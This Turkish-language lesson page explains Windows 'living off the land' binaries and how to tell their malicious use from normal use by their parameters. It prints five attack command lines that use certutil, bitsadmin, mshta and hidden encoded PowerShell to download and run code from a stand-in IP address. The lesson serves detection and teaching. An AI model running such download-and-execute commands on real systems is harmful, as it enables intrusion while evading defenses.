İçeriğe atla
0 XP 0
0/4

Puan ders bitince hesaba yazılır. Bu dersi tamamlayınca +60 XP alacaksın. Giriş yapmadan ilerlersen puan yalnız bu tarayıcıda durur.

9 dk · 60 XP · 4 etkinlik

Yaşayan ikililer (LOLBins)

Yaşayan ikili, sistemle birlikte gelen meşru bir programdır. İngilizce kısaltması LOLBin olarak geçer. Saldırgan bunları kullanır çünkü dosya indirmesi gerekmez, imza denetimi takılmaz ve çoğu kural bu adları beyaz listede tutar.

Örnekler tanıdıktır. certutil sertifika aracıdır ama dosya indirir. bitsadmin arka plan aktarım aracıdır, o da indirir. rundll32 kütüphane çağırır, mshta ise HTML uygulaması çalıştırır. Hepsi Windows'la gelir.

certutil.exe -urlcache -split -f http://203.0.113.19/a.exe C:\Users\Public\a.exe
bitsadmin /transfer j /download http://203.0.113.19/b.dll C:\Users\Public\b.dll
rundll32.exe C:\Users\Public\b.dll,Start
mshta.exe http://203.0.113.19/x.hta
powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA
Beş satır, beş meşru program. Hiçbiri zararlı yazılım değildir; hepsi zararlı iş yapar.

Zararlı kullanım isimden değil parametreden anlaşılır. certutil normalde sertifika doğrular ya da karma hesaplar; -urlcache ve -split parametreleriyle çalıştığında internetten dosya indirir, bu ikinci kullanım şüphelidir. powershell.exe -File ile yerel bir betik açmak sıradandır, ama -enc ile kodlanmış komut çalıştırmak nadiren meşrudur. mshta.exe'nin yerel bir dosyayı açması farklıdır, uzak bir adresten .hta çekmesi farklıdır; ikincisi neredeyse her zaman kötüye kullanımdır. rundll32.exe de aynı şekilde çalışır: bilinen bir sistem kütüphanesinden denetim masası ögesi açması normaldir, bilinmeyen bir yoldaki kütüphaneyi çağırması değildir. Aynı programın iki satırını yan yana koyup parametreyi karşılaştırmak en hızlı ayırt etme yoludur.